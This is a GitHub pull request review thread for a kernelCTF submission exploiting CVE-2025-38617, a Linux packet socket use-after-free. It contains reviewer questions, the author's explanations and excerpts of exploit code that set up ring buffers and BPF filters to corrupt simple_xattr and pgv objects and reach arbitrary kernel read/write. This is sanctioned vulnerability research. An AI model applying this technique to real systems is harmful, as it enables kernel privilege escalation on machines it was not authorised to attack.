Add kernelCTF CVE-2025-38617_mitigation_cos#339
Add kernelCTF CVE-2025-38617_mitigation_cos#339quanggle97 wants to merge 36 commits intogoogle:masterfrom
Conversation
|
@koczkatamas Pull request is ready for reviewing |
koczkatamas
left a comment
There was a problem hiding this comment.
Hey!
Your exploit code and writeup is very long and although explains a lot of details, it's very hard to follow or get a quick understanding what's happening exactly.
So I have a few questions:
Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due the UAF? Which fields of those objects are used (those which are relevant for the exploitation)?
Q2. What object did you spray pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?
Q3. My understanding is that you can overwrite a simple_xattr's structure size field via the original vulnerability in pages_order2_read_primitive.
Let's say simple_xattr looks like this:
struct simple_xattr {
struct rb_node rb_node; /* 0 24 */
char * name; /* 24 8 */
size_t size; /* 32 8 */
char value[]; /* 40 0 */
};
What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?
Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)
If you'd like to only overwrite 8 bytes, why don't you send a 8-byte long packet? To get into the right cache?
Are the other fields (like rb_node, name, or value) overwritten or your primitive allows you precise only 8-byte overwrite of the size field?
What other constraints do you have for this primitive? Can you choose any offset and size, or there are any restrictions?
Q4. From which object's which field do you leak leaked_content_simple_xattr_kernel_address?
Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?
Which fields do you use for the RW purpose? name or value+size? Where I see setting these fields in the source code?
Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?
| rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; | ||
| rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; | ||
| rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; | ||
| rx_ring.tp_sizeof_priv = 16248; |
There was a problem hiding this comment.
Is this the place you are adjusting the right offset to be written? How do you calculate this offset exactly? Please use struct sizes and field offsets in the calculation to understand how this works.
There was a problem hiding this comment.
Q1: The ring buffer is freed (represented by struct pgv which is basically an array of kernel pointers)
Q2: Another ring buffer is used for reclamation purpose.
Q3: The vuln allows me to perform oob write with control size and control offset. How the exploit control the offset I think i described in UAF section. The packet is allocated from function packet_sendmsg_spkt() which has a check inside dev_validate_header() that doesn't allow packet with 8 bytes len. I specifically chose to only the size field. I can build the generic page overflow primitive but I decided just to pick the number fit my strategy.
Q4: Yes
Q5: The simple_xattr_read_write_primitive only allows us to perform read/write on that struct simple_xattr object not abr read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we free that struct simple_xattr object, what if we fail to reclaim its with something we want ?
There was a problem hiding this comment.
Hey!
A few followup questions / requests:
Q1) Why is packet_reserve = 38 in mitigation and packet_reserve = 30 in the COS version, what's the difference between the two versions (field offsets, source code differences)?
Q2) IIUC first you overwrite simple_xattr.size at offset 32 (in pages_order2_read_primitive_init), and then pgv[0].buffer at offset 0 (in simple_xattr_read_write_primitive_init), but both functions use tp_sizeof_priv = 16248 and packet_reserve = 38 (in mitigation). What am I missing, where is the 32 bytes difference that you overwrite different offsets with the seemingly same parameters?
Q3) So IIUC you can read/write arbitrary address with simple_xattr_read_write_primitive too but simple_xattr requires spraying the object again and this process can fail (unreliable), so you created abr_page_read_write_primitive which is a stable ARB read/write primitive. Is my understanding correct or are there other differences?
There was a problem hiding this comment.
Q1: Because difference struct simple_xattr layout between COS and Mitigation (one use linked list and one use red black tree).
Q2: I overwrite pgv + X where X represent the same offset as size offset in struct simple_xattr. Although overwrite pgv[0] is possible to but since the difference doesn't matter, I decide to keep the offset the same.
Q3: Yes. We need to win race 2 times to reach this point so I don't want to lose that strong primitive so I try to think about further exploit flow that cannot fail.
| struct tpacket_req3 tx_ring = {}; | ||
| tx_ring.tp_block_size = PAGES_ORDER1_SIZE; | ||
| tx_ring.tp_block_nr = 1; | ||
| tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; | ||
| tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; | ||
|
|
||
| struct tpacket_req3 rx_ring = {}; | ||
| rx_ring.tp_block_size = PAGES_ORDER3_SIZE; | ||
| rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; | ||
| rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; | ||
| rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; | ||
| rx_ring.tp_sizeof_priv = 16248; | ||
| rx_ring.tp_retire_blk_tov = USHRT_MAX; | ||
|
|
||
| struct sock_filter filter[MAX_FILTER_LEN] = {}; | ||
| for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { | ||
| filter[i].code = BPF_LD | BPF_IMM; | ||
| filter[i].k = 0xcafebabe; | ||
| } | ||
|
|
||
| filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; | ||
| filter[MAX_FILTER_LEN - 1].k = sizeof(void *); | ||
|
|
||
| primitive->victim_packet_socket_config = victim_packet_socket_config_create( | ||
| (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo | ||
| (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr | ||
| tx_ring, // tx_ring | ||
| rx_ring, // rx_ring | ||
| 1, // packet_loss | ||
| TPACKET_V3, // packet_version | ||
| 30, // packet_reserve | ||
| filter // filter | ||
| ); |
There was a problem hiding this comment.
Significant code duplication for setting up packet socket configuration rings and BPF filters.
Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();Read more about this violation in the 'Code duplication' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
There was a problem hiding this comment.
Like i commented above, I don't build generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if i want to perform PAGES_ORDER3_SIZE overflow, i will chose the buffer size of victim ring buffer to have size PAGES_ORDER4_SIZE and the buffer size of reclamation ring buffer to have size PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset to. I think i described these on the UAF section.
|
|
||
| alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); | ||
| void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); | ||
| void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); |
There was a problem hiding this comment.
Variable name mem1 is too generic and similar to mem.
Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);Read more about this violation in the 'Naming conventions' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
There was a problem hiding this comment.
At that point, these addresses are freed and the expectation is struct pgv object is successfully reclaim on one of these addresses. I kept mem and mem1 to represent right now, the exploit still not know what actually in these addresses.
|
|
||
| bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive) | ||
| { | ||
| void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive); |
There was a problem hiding this comment.
Too generic variable name 'tmp' used for primitive output.
Recommendation: Rename the variable to reflect its contents, such as leaked_data.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);Read more about this violation in the 'Naming conventions' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
| if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) { | ||
| pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next; | ||
| pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; | ||
| } else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) { | ||
| pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev; | ||
| pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; | ||
| } |
There was a problem hiding this comment.
Logic to set kernel address variables is duplicated verbatim across if/else blocks.
Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev; pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr; pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;Read more about this violation in the 'Code duplication' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
| rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; | ||
| rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; | ||
| rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; | ||
| rx_ring.tp_sizeof_priv = 16248; |
There was a problem hiding this comment.
Usage of an unexplained magic number.
Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
There was a problem hiding this comment.
Again, i don't build generic page overflow function. If i have to use a descriptive macro, it will look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...
| struct sock_filter filter[MAX_FILTER_LEN] = {}; | ||
| for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { | ||
| filter[i].code = BPF_LD | BPF_IMM; | ||
| filter[i].k = 0xcafebabe; |
There was a problem hiding this comment.
Unexplained magic number used in BPF filter.
Recommendation: Define the magic number as a macro or document its irrelevance.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
|
tried to execute it locally on both mitigation-v4-6.6 and cos-109-17800.519.4 and it stuck on pages_order2_read_primitive_build , any idea why ? is the race failing? Is it related to, saw you modify this : |
|
It also seems that the exploit does not have a 100% success rate as stated in the "stability_notes". Most of the time it causes a kernel NULL pointer dereference bug, which contradicts what you said in your blog - that it can be deterministic. |
|
@wizkernel : Due to the pull request script check that auto kill if no flag output in 60 seconds, I have to play with the interrupt amplitude to make it good enough to win race in 60 seconds. Although there is a way to detect if tpacket_rcv() hitted and interrupt hitted, doing so make the exploit cannot finish in time. The NULL pointer dereference usually happened on the non-mitigation instance because I develop the exploit for the mitigation first and port to other instance later. The stability_notes is just for reference. I usually copy from old file and modify necessary field. But I'm pretty sure if you have the correct local interrupt amplitude or modify the code locally to run with the interrupt amplitude range loop, the mitigation exploit success rate is around 90%->100% (again, usually took more than 60s) |
|
@wizkernel The blog post describes the exploit flow optimized for mitigation instance. For non-mitigation instance, there should be other choice to reclaim the UAF object due to no heap hardening. Back then, I submitted the flag for LTS instance too but cannot win the slot (last slot before the userns is disabled). Therefore, I don't even try to write another version optimized for non-mitigation instance (COS just need 10% stability). |
No description provided.